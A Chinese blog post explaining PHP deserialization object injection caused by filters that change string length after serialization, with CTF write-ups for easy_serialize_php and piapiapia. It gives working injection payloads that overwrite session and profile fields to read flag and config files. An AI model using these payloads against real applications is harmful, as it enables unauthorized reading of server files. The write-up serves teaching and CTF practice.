浅析PHP反序列化中过滤函数使用不当导致的对象注入问题


Posted in PHP onFebruary 15, 2020

1.漏洞产生的原因

#### 正常的反序列化语句是这样的

$a='a:2:{s:8:"username";s:7:"dimpl3s";s:8:"password";s:6:"abcdef";}';

但是如果写成这样

$b='a:2:{s:8:"username";s:7:"dimpl3s";s:8:"password";s:6:"123456";}s:8:"password";s:6:"abcde";}';

也可以正常的编译, 而且下面一条语句的结果是 password=“123456” 而不是abcde

浅析PHP反序列化中过滤函数使用不当导致的对象注入问题

结果

浅析PHP反序列化中过滤函数使用不当导致的对象注入问题

这就说明一个问题,在反序列化的时候,只要求第一个序列化字符串合法就行,换我个理解,就是反序列话时,他会从前往后读取,当读取第一个合法的序列化的字符串时,就会反序列化。

### 当过滤用户输入参数的时候,如果先序列化再对序列化过后的字符串进行过滤,而且在过滤的过程中会导致原本的长度改变,就可能造成序列化对象注入漏洞。

此处参考别人的代码:

浅析PHP反序列化中过滤函数使用不当导致的对象注入问题

浅析PHP反序列化中过滤函数使用不当导致的对象注入问题

可以看到,这里过滤函数将原来的x换成了zz,但是长度却超过了原来的长度 ,但是原来长度的数字时没变的,这就导致报错。但是试想一下,如果这里的密码是可控的,然后我们输入字符

的时候带入双引号和} 会怎么样呢? 看如下代码

浅析PHP反序列化中过滤函数使用不当导致的对象注入问题

结果

浅析PHP反序列化中过滤函数使用不当导致的对象注入问题

第一排是我们构造的东西序列化过后的值,

第二排是序列化过后的值进行过滤过后的值,可以看到,此时由于x换成了z,而前面读40的时候正好会读到最后一个x,从而使我们输入的新对象得以注入,而且得到正常的反序列化。

第三排是反序列化过后的到的值,此时原本的aaaaaa的值已经被我们覆盖。

二:实例分析

根据上面的原因可知,产生漏洞最直接的原因是因为序列化过后的字符串被过滤的时长度发生变化, 根据这个这个原因,我们就可以把漏洞分为 长度变长,和长度变短两种情况,注意! 如果长度不变的话,不会引起漏洞产生。

(1) 长度变短。

题目: 安洵杯2019 easy_serialize_php // 在https://buuoj.cn/这个靶场里又复现

源码:

浅析PHP反序列化中过滤函数使用不当导致的对象注入问题

根据提示在phpinfo拿到

浅析PHP反序列化中过滤函数使用不当导致的对象注入问题

很显然答案在 d0g3_f1ag.php里面,关键是我们怎么去读取他的源码 ,可以看到最后一排的会获取 ['img'] 中的 的源码,我们仅需要覆盖img的值将他变成d0g3_f1ag.php就行。

在看这个过滤函数

浅析PHP反序列化中过滤函数使用不当导致的对象注入问题

他会使得输入的相应字符变为空,也就是让序列化后的字符串变短,我们就可以利用此来吞掉原本的变量名,而注入我们想注入的代码。

第一种解法:值逃逸

d0g3_f1ag.php的base64 编码 ZDBnM19mMWFnLnBocA== 长度20

在本地测试的时候得到正常的 序列化字符是这样的

a:3:{s:4:"user";s:5:"guest";s:8:"function";s:3:"123";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}

前者user,和function 的值都是我们可控的

我们想要构造的是 s:3:"img";s:20:"ZDBnM19mMWFnLnBocA=="; 设想一下 ,如果我们把它设置function的值,并且在前面user的值利用过滤函数将后面的 "s:8:"function";s:xx:" 吞掉,那么function的值,也就是我们想要注入的对象,不就正好上位了吗? 但是注意闭合前面的由于吞掉而缺少的分号和双引号,而且,这里两个双引号紧挨着会报错,所以我们加一个字符,再把这个字符一起吞掉就行,还有 这里前面是 a:3: 所以我在最后还要添加一个属性。

payload

_SESSION[user]=flagflagflagflagflagflag&_SESSION[function]=a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}

读到源码

浅析PHP反序列化中过滤函数使用不当导致的对象注入问题

再去修改payload的文件中的值,然后再去访问,发现什么也没有返回,然后尝试 /../d0g3_fllllllag 然后base64编码 去访问就会返回flag

浅析PHP反序列化中过滤函数使用不当导致的对象注入问题

(2)长度变长

题目 [0CTF] piapiapia // 同样在buu里又复现

wp参考这里 -> https://3water.com/article/180496.htm

a:4:{s:5:"phone";s:11:"12345678901";s:5:"email";s:8:"ss@q.com";s:8:"nickname";s:8:"sea_sand";s:5:"photo";s:10:"config.php";}s:39:"upload/804f743824c0451b2f60d81b63b6a900";}

红色部分是我们想要注入的,这道题的过滤函数有三个 ,但是导致长度变化的过滤是这个

浅析PHP反序列化中过滤函数使用不当导致的对象注入问题

where->hacker 多出了一个字符

但是另一个过滤使 nickname 有长度限制

浅析PHP反序列化中过滤函数使用不当导致的对象注入问题

这里strlen我们可以用数组绕过,但是如果使用数组就会引起序列化字符串产生变化

a:4:{s:5:"phone";s:11:"12345678901";s:5:"email";s:8:"ss@q.com";s:8:"nickname";a:1:{i:0;s:3:"xxx"};s:5:"photo";s:10:"config.php";}s:39:"upload/804f743824c0451b2f60d81b63b6a900";}

注意数组在序列化中的表示 是 先; 再 }

这里我进行了本地测试

浅析PHP反序列化中过滤函数使用不当导致的对象注入问题

结果:

浅析PHP反序列化中过滤函数使用不当导致的对象注入问题

红色部分为我们想注入的,蓝色的是我们提交payload的地方,后面实际上根本不用管

现在我们想的是通过where ->hacker 多了一个字符,这样使我们输入的nickname的值逃逸出去变成对象,

加上闭合前面的单引号和反括号 就是这样 ";}s:5:"photo";s:10:"config.php";}

一共就是34个字符, 一个where 逃逸出一个字符,这里就需要34个where

payload:wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}    

三.总结

武汉加油!中国加油!我加油!

以上所述是小编给大家介绍的PHP反序列化中过滤函数使用不当导致的对象注入问题,希望对大家有所帮助!

PHP 相关文章推荐
php date与gmdate的获取日期的区别
Feb 08 PHP
php数组(array)输出的三种形式详解
Jun 05 PHP
浅析PHP的ASCII码转换类
Jul 05 PHP
php json与xml序列化/反序列化
Oct 28 PHP
php生成图形(Libchart)实例
Nov 06 PHP
php通过array_merge()函数合并两个数组的方法
Mar 18 PHP
php中二维数组排序问题方法详解
Aug 28 PHP
简介WordPress中用于获取首页和站点链接的PHP函数
Dec 17 PHP
WordPress过滤垃圾评论的几种主要方法小结
Jul 11 PHP
php下载文件,添加响应头的简单实例
Sep 22 PHP
Laravel框架路由和控制器的绑定操作方法
Jun 12 PHP
PHP+redis实现的悲观锁机制示例
Jun 12 PHP
laravel框架使用极光推送消息操作示例
Feb 15 #PHP
laravel框架使用阿里云短信发送消息操作示例
Feb 15 #PHP
laravel框架实现敏感词汇过滤功能示例
Feb 15 #PHP
PHP 枚举类型的管理与设计知识点总结
Feb 13 #PHP
PHP+ajax实现上传、删除、修改单张图片及后台处理逻辑操作详解
Feb 12 #PHP
分享8个Laravel模型时间戳使用技巧小结
Feb 12 #PHP
tp5.0框架隐藏index.php入口文件及模块和控制器的方法分析
Feb 11 #PHP
You might like
php基础知识:类与对象(2) 自动加载对象
2006/12/13 PHP
php foreach 参数强制类型转换的问题
2010/12/10 PHP
PHP中英混合字符串截取函数代码
2011/07/17 PHP
利用PHP实现短域名互转
2013/07/05 PHP
YII框架中搜索分页jQuery写法详解
2016/12/19 PHP
PHP实现实时生成并下载超大数据量的EXCEL文件详解
2017/10/23 PHP
php-fpm重启导致的程序执行中断问题详解
2019/04/29 PHP
Jquery日期选择datepicker插件用法实例分析
2015/06/08 Javascript
js绘制圆形和矩形的方法
2015/08/05 Javascript
实用又漂亮的BootstrapValidator表单验证插件
2016/05/30 Javascript
JavaScript变量作用域_动力节点Java学院整理
2017/06/27 Javascript
React-Native 组件之 Modal的使用详解
2017/08/08 Javascript
shiro授权的实现原理
2017/09/21 Javascript
vue.js如何将echarts封装为组件一键使用详解
2017/10/10 Javascript
Angular Material Icon使用详解
2018/11/07 Javascript
JavaScript格式化json和xml的方法示例
2019/01/22 Javascript
详解JavaScript的数据类型以及数据类型的转换
2019/04/20 Javascript
js神秘的电报密码 哈弗曼编码实现
2019/09/10 Javascript
微信小程序iOS下拉白屏晃动问题解决方案
2019/10/12 Javascript
vuex 实现getter值赋值给vue组件里的data示例
2019/11/05 Javascript
vue中实现拖动调整左右两侧div的宽度的示例代码
2020/07/22 Javascript
JS倒计时两种实现方式代码实例
2020/07/27 Javascript
python删除过期文件的方法
2015/05/29 Python
200 行python 代码实现 2048 游戏
2018/01/12 Python
django 通过url实现简单的权限控制的例子
2019/08/16 Python
利用jupyter网页版本进行python函数查询方式
2020/04/14 Python
Python 为什么推荐蛇形命名法原因浅析
2020/06/18 Python
Html5 Geolocation获取地理位置信息实例
2016/12/09 HTML / CSS
食堂员工工作职责
2013/12/18 职场文书
小学新教师培训方案
2014/02/03 职场文书
环保专项行动方案
2014/05/12 职场文书
答谢会策划方案
2014/05/12 职场文书
党员自我评议对照检查材料
2014/09/27 职场文书
2016年教师党员创先争优承诺书
2016/03/24 职场文书
2019年聘任书的写作格式及范文!
2019/07/03 职场文书
《狼牙山五壮士》读后感:宁死不屈,视死如归
2019/08/16 职场文书